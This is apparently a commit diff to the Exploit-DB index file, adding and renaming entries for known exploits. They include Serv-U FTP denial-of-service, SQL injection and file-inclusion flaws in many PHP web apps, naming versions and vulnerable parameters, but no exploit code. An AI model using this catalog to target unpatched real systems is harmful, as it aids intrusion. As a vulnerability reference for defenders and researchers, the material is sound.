DB: 2016-12-27

4 new exploits

Serv-U FTP Server < 5.2 - Remote Denial of Service
RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service

Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service
RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service

Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service
RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service

FTPShell Server 6.36 - '.csv' Local Denial of Service

Serv-U FTP Server 3.x < 5.x - Privilege Escalation
RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation

Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation

Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit

Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal
Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal

IndexScript 2.8 - (show_cat.php cat_id) SQL Injection
IndexScript 2.8 - 'cat_id' Parameter SQL Injection

GForge < 4.6b2 - (skill_delete) SQL Injection
GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection

torrenttrader classic 1.07 - Multiple Vulnerabilities
TorrentTrader Classic 1.07 - Multiple Vulnerabilities

Camera Life 2.6.2 - 'id' SQL Injection
Camera Life 2.6.2 - 'id' Parameter SQL Injection

Full PHP Emlak Script - 'arsaprint.php id' SQL Injection
Full PHP Emlak Script - 'arsaprint.php' SQL Injection

CCMS 3.1 - (skin) Multiple Local File Inclusion
CCMS 3.1 - 'skin' Parameter Local File Inclusion

JMweb - Multiple (src) Local File Inclusion
JMweb - 'src' Parameter Local File Inclusion

geccBBlite 2.0 - (leggi.php id) SQL Injection
geccBBlite 2.0 - 'id' Parameter SQL Injection
PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection
PHP-Fusion Mod recept - (kat_id) SQL Injection
PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection
PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection

Yerba SACphp 6.3 - (mod) Local File Inclusion
Yerba SACphp 6.3 - Local File Inclusion

Joomla! Component com_hotspots - (w) SQL Injection
Joomla! Component com_hotspots - SQL Injection
PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection
PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection
PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection
Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection
PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection
PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection
PHP Autos 2.9.1 - 'catid' Parameter SQL Injection
Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection

AdMan 1.1.20070907 - 'campaignId' SQL Injection
AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection
Gforge 4.5.19 - Multiple SQL Injections
Gforge 4.6 rc1 - (skill_edit) SQL Injection
GForge 4.5.19 - Multiple SQL Injections
Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection

camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting
Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting

IranMC Arad Center - 'news.php id' SQL Injection
IranMC Arad Center - SQL Injection

Ayco Okul Portali - (linkid) SQL Injection (tr)
Ayco Okul Portali - 'linkid' Parameter SQL Injection

Easynet4u faq Host - 'faq.php faq' SQL Injection
Easynet4u faq Host - 'faq.php' SQL Injection
MunzurSoft Wep Portal W3 - (kat) SQL Injection
Easynet4u Link Host - 'cat_id' SQL Injection
SlimCMS 1.0.0 - (redirect.php) Privilege Escalation
Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection
MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection
Easynet4u Link Host - 'cat_id' Parameter SQL Injection
SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation
Joomla! Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection

Real Estate Scripts 2008 - 'index.php cat' SQL Injection
Real Estate Scripts 2008 - 'cat' Parameter SQL Injection
ParsBlogger - 'links.asp id' SQL Injection
IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection
ParsBlogger - 'links.asp' SQL Injection
IndexScript 3.0 - 'parent_id' Parameter SQL Injection

XOOPS Module xhresim - 'index.php no' SQL Injection
XOOPS Module xhresim - SQL Injection

SezHoo 0.1 - (IP) Remote File Inclusion
SezHoo 0.1 - Remote File Inclusion

torrenttrader classic 1.09 - Multiple Vulnerabilities
TorrentTrader Classic 1.09 - Multiple Vulnerabilities

AdaptCMS Lite 1.5 2009-07-07 - Exploit
AdaptCMS Lite 1.5 - Arbitrary Add Admin

Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting
Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting

GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting
GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting
OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting
OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting
OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting
ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting
Joomla! Component Blog Calendar - SQL Injection
PHPMailer 5.2.17 - Remote Code Execution
This commit is contained in:
Offensive Security 2016-12-27 05:01:16 +00:00
parent af66bcd9e5
commit 6a202bbb97
6 changed files with 286 additions and 48 deletions

View file

@ -71,7 +71,7 @@ id,file,description,date,author,platform,type,port
428,platforms/windows/dos/428.c,"CesarFTP Server - Long Command Denial of Service",2004-08-31,lion,windows,dos,0
429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0
433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0
463,platforms/windows/dos/463.c,"Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
463,platforms/windows/dos/463.c,"RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service",2004-09-13,str0ke,windows,dos,0
468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service",2004-09-19,"Luigi Auriemma",windows,dos,0
471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service",2004-09-21,"GulfTech Security",windows,dos,66
474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0
@ -814,7 +814,7 @@ id,file,description,date,author,platform,type,port
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
6660,platforms/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0
6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0
@ -960,7 +960,7 @@ id,file,description,date,author,platform,type,port
8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,linux,dos,0
8212,platforms/windows/dos/8212.pl,"Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
8212,platforms/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
8213,platforms/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
8219,platforms/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,multiple,dos,0
8224,platforms/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,windows,dos,0
@ -5330,6 +5330,7 @@ id,file,description,date,author,platform,type,port
40958,platforms/multiple/dos/40958.c,"macOS 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
40959,platforms/multiple/dos/40959.c,"macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",multiple,dos,0
40964,platforms/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,windows,dos,0
40965,platforms/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5444,7 +5445,7 @@ id,file,description,date,author,platform,type,port
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0
374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0
375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local,0
381,platforms/windows/local/381.c,"Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
@ -8735,6 +8736,7 @@ id,file,description,date,author,platform,type,port
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -9889,7 +9891,7 @@ id,file,description,date,author,platform,type,port
8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",windows,remote,0
8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0
8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0
8211,platforms/windows/remote/8211.pl,"Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
8211,platforms/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0
8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
@ -11785,7 +11787,7 @@ id,file,description,date,author,platform,type,port
20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0
20459,platforms/windows/remote/20459.html,"Microsoft Internet Explorer 5 - 'INPUT TYPE=FILE' Exploit",2000-12-01,Key,windows,remote,0
20460,platforms/windows/remote/20460.txt,"Microsoft Windows NT 4.0 - Phonebook Server Buffer Overflow",2000-12-04,"Alberto Solino",windows,remote,0
20461,platforms/windows/remote/20461.txt,"Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
20461,platforms/windows/remote/20461.txt,"Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal",2000-12-05,Zoa_Chien,windows,remote,0
20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey - Remote Command Execution",1998-08-04,Tom,unix,remote,0
20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 - Remote Command Execution",1997-07-10,"Razvan Dragomirescu",cgi,remote,0
20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 - cachemgr.cgi Unauthorized Connection",1999-07-23,fsaa,cgi,remote,0
@ -17830,7 +17832,7 @@ id,file,description,date,author,platform,type,port
4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0
4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0
4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0
4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - 'cat_id' Parameter SQL Injection",2007-07-25,xssvgamer,php,webapps,0
40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0
4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
@ -17915,7 +17917,7 @@ id,file,description,date,author,platform,type,port
4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - PHPFFL_FILE_ROOT Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0
4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0
@ -17986,7 +17988,7 @@ id,file,description,date,author,platform,type,port
4496,platforms/php/webapps/4496.txt,"Joomla! Component Flash Image Gallery - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps,0
4497,platforms/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps,0
4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0
4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0
4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - galerie.php SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0
4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - (xkurl.php PEARPATH) Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0
4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - common.php Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0
@ -19232,7 +19234,7 @@ id,file,description,date,author,platform,type,port
6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0
6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0
6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' Parameter SQL Injection",2008-07-25,nuclear,php,webapps,0
6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0
6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
@ -19611,73 +19613,73 @@ id,file,description,date,author,platform,type,port
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - (skin) Multiple Local File Inclusion",2008-10-03,SirGod,php,webapps,0
6663,platforms/php/webapps/6663.txt,"CCMS 3.1 - 'skin' Parameter Local File Inclusion",2008-10-03,SirGod,php,webapps,0
6664,platforms/php/webapps/6664.txt,"Kwalbum 2.0.2 - Arbitrary File Upload",2008-10-03,"CWH Underground",php,webapps,0
6667,platforms/php/webapps/6667.txt,"pPIM 1.01 - 'notes.php' Local File Inclusion",2008-10-04,JosS,php,webapps,0
6669,platforms/php/webapps/6669.txt,"JMweb - Multiple (src) Local File Inclusion",2008-10-04,SirGod,php,webapps,0
6669,platforms/php/webapps/6669.txt,"JMweb - 'src' Parameter Local File Inclusion",2008-10-04,SirGod,php,webapps,0
6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin 1.0 - Arbitrary File Upload",2008-10-04,Pepelux,php,webapps,0
6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public 1.0 - Arbitrary File Upload / Information (c99)",2008-10-05,JosS,php,webapps,0
6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0
6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0
6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0
6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0
6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0
6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0
6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - (kat_id) SQL Injection",2008-10-05,boom3rang,php,webapps,0
6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system - 'raceid' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0
6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 - Multiple Remote File Inclusion",2008-10-06,NoGe,php,webapps,0
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - (mod) Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
6687,platforms/php/webapps/6687.pl,"Yerba SACphp 6.3 - Local File Inclusion",2008-10-06,Pepelux,php,webapps,0
6691,platforms/php/webapps/6691.txt,"Yerba SACphp 6.3 - Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - (w) SQL Injection",2008-10-07,cOndemned,php,webapps,0
6692,platforms/php/webapps/6692.txt,"Joomla! Component com_hotspots - SQL Injection",2008-10-07,cOndemned,php,webapps,0
6693,platforms/php/webapps/6693.txt,"Yourownbux 4.0 - 'cookie' SQL Injection",2008-10-07,Tec-n0x,php,webapps,0
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection",2008-10-07,d3v1l,php,webapps,0
6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 - 'catid' Parameter SQL Injection",2008-10-07,Mr.SQL,php,webapps,0
6697,platforms/php/webapps/6697.txt,"Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection",2008-10-07,d3v1l,php,webapps,0
6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic 1.04 - Blind SQL Injection",2008-10-07,BazOka-HaCkEr,php,webapps,0
6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) - Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0
6701,platforms/php/webapps/6701.txt,"HispaH textlinksads - 'index.php' SQL Injection",2008-10-08,InjEctOr5,php,webapps,0
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection",2008-10-08,SuB-ZeRo,php,webapps,0
6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD",2008-10-08,GoLd_M,php,webapps,0
6706,platforms/php/webapps/6706.php,"Kusaba 1.0.4 - Remote Code Execution (1)",2008-10-09,Sausage,php,webapps,0
6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0
6707,platforms/php/webapps/6707.txt,"GForge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection",2008-10-09,beford,php,webapps,0
6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0
6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
6710,platforms/php/webapps/6710.txt,"Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0
6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - SQL Injection",2008-10-09,"Hussin X",php,webapps,0
6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0
6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL Injection) User Credentials Disclosure",2008-10-09,gnix,php,webapps,0
6715,platforms/php/webapps/6715.txt,"Scriptsez Easy Image Downloader - Local File Download",2008-10-09,JosS,php,webapps,0
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0
6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali - 'linkid' Parameter SQL Injection",2008-10-10,Crackers_Child,asp,webapps,0
6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host - 'forum.php' SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0
